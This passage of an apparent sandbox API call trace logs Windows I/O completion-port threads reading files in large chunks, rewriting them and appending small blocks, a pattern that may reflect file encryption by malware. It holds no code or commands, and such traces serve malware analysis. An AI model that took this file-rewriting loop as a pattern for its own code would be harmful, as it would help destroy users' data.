dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b90020) returned 1 [0167.983] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.983] WriteFile (in: hFile=0x1f4, lpBuffer=0x3710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3710020 | out: lpBuffer=0x3710094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3710020) returned 1 [0167.984] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0167.984] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3cb0020) returned 1 [0167.984] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.984] WriteFile (in: hFile=0x1c0, lpBuffer=0x3830094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3830020 | out: lpBuffer=0x3830094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3830020) returned 1 [0167.984] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.984] CloseHandle (hObject=0x1b0) returned 1 [0167.985] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0167.986] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.986] WriteFile (in: hFile=0x194, lpBuffer=0x3950094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3950020 | out: lpBuffer=0x3950094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3950020) returned 1 [0167.986] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.986] WriteFile (in: hFile=0x1b8, lpBuffer=0x3a70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3a70020 | out: lpBuffer=0x3a70094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3a70020) returned 1 [0167.986] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.986] CloseHandle (hObject=0x1dc) returned 1 [0167.991] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0167.994] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.994] WriteFile (in: hFile=0x1c8, lpBuffer=0x3b90094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3b90020 | out: lpBuffer=0x3b90094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3b90020) returned 1 [0167.994] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0167.994] CloseHandle (hObject=0x1f4) returned 1 [0167.997] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3710020) returned 1 [0168.000] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.000] WriteFile (in: hFile=0x1c4, lpBuffer=0x3cb0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3cb0020 | out: lpBuffer=0x3cb0094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3cb0020) returned 1 [0168.000] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.000] CloseHandle (hObject=0x1c0) returned 1 [0168.002] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3830020) returned 1 [0168.004] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.004] CloseHandle (hObject=0x194) returned 1 [0168.055] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3950020) returned 1 [0168.058] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.058] CloseHandle (hObject=0x1c8) returned 1 [0168.080] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3b90020) returned 1 [0168.082] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.654] WriteFile (in: hFile=0x1c4, lpBuffer=0x3680124, nNumberOfBytesToWrite=0x5d38, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3680020) returned 0x0 [0168.659] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.662] WriteFile (in: hFile=0x1f4, lpBuffer=0x3b00124*, nNumberOfBytesToWrite=0x118e2, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3b00020 | out: lpBuffer=0x3b00124*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x3b00020) returned 1 [0168.685] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.686] ReadFile (in: hFile=0x198, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x2690020) returned 0x0 [0168.687] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.687] ReadFile (in: hFile=0x1c4, lpBuffer=0x3680124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3680020) returned 0x0 [0168.687] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.687] ReadFile (in: hFile=0x194, lpBuffer=0x37a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x37a0020 | out: lpBuffer=0x37a0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x37a0020) returned 0x0 [0168.687] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.687] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x38c0020 | out: lpBuffer=0x38c0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x38c0020) returned 0x0 [0168.687] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.687] ReadFile (in: hFile=0x1d0, lpBuffer=0x39e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x39e0020 | out: lpBuffer=0x39e0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x39e0020) returned 0x0 [0168.687] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.687] ReadFile (in: hFile=0x1cc, lpBuffer=0x40a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x40a0020 | out: lpBuffer=0x40a0124*, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x40a0020) returned 1 [0168.687] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.687] ReadFile (in: hFile=0x1f4, lpBuffer=0x3b00124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3b00020 | out: lpBuffer=0x3b00124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3b00020) returned 0x0 [0168.688] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.688] ReadFile (in: hFile=0x1dc, lpBuffer=0x3c20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3c20020 | out: lpBuffer=0x3c20124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3c20020) returned 0x0 [0168.688] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0168.688] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0168.688] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0168.688] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3680020) returned 1 [0168.688] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0168.688] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37a0020) returned 1 [0168.688] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0168.688] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x38c0020) returned 1 [0168.688] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 0 [0168.688] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x39e0020) returned 1 [0168.688] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.688] WriteFile (in: hFile=0x1cc, lpBuffer=0x40a0124, nNumberOfBytesToWrite=0x2765, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x40a0020 | out: lpBuffer=0x40a0124, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x40a0020) returned 0x0 [0168.704] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.704] WriteFile (in: hFile=0x194, lpBuffer=0x37a0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x37a0020 | out: lpBuffer=0x37a0094*, lpNumberOfBytesWritten=0x2aaf9e0, lpOverlapped=0x37a0020) returned 1 [0168.709] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.711] ReadFile (in: hFile=0x1e0, lpBuffer=0x3f80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x3f80020 | out: lpBuffer=0x3f80124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x3f80020) returned 0x0 [0168.711] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.712] ReadFile (in: hFile=0x1cc, lpBuffer=0x40a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2aaf9e0, lpOverlapped=0x40a0020 | out: lpBuffer=0x40a0124, lpNumberOfBytesRead=0x2aaf9e0*=0x0, lpOverlapped=0x40a0020) returned 0x0 [0168.712] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.712] CloseHandle (hObject=0x198) returned 1 [0168.741] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0168.743] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.743] CloseHandle (hObject=0x1a0) returned 1 [0168.772] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x38c0020) returned 1 [0168.775] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.782] CloseHandle (hObject=0x1dc) returned 1 [0168.800] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3c20020) returned 1 [0168.803] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 [0168.803] CloseHandle (hObject=0x1ac) returned 1 [0168.847] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3d40020) returned 1 [0168.850] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2aaf9e0, lpCompletionKey=0x2aaf9dc, lpOverlapped=0x2aaf9e4) returned 1 Thread: id = 118 os_tid = 0xbc0 [0148.850] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0155.985] CloseHandle (hObject=0x1d0) returned 1 [0156.020] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0156.022] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.291] ReadFile (in: hFile=0x1c8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3510020) returned 1 [0156.292] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.318] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0xf7a6, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3510020) returned 1 [0156.324] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.328] ReadFile (in: hFile=0x1ac, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0156.328] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.330] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0156.330] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0156.331] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0156.331] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.348] ReadFile (in: hFile=0x1b8, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3870020) returned 0x0 [0156.348] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.350] WriteFile (in: hFile=0x1d8, lpBuffer=0x3750094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3750020 | out: lpBuffer=0x3750094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3750020) returned 1 [0156.360] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.364] CloseHandle (hObject=0x1c8) returned 1 [0156.401] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0156.403] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.403] ReadFile (in: hFile=0x1bc, lpBuffer=0x3ab0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3ab0020 | out: lpBuffer=0x3ab0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3ab0020) returned 0x0 [0156.403] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.403] CloseHandle (hObject=0x1b8) returned 1 [0156.419] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3870020) returned 1 [0156.422] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.634] WriteFile (in: hFile=0x1bc, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x166f8, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2b70020) returned 1 [0156.644] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0156.644] ReadFile (in: hFile=0x1bc, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, 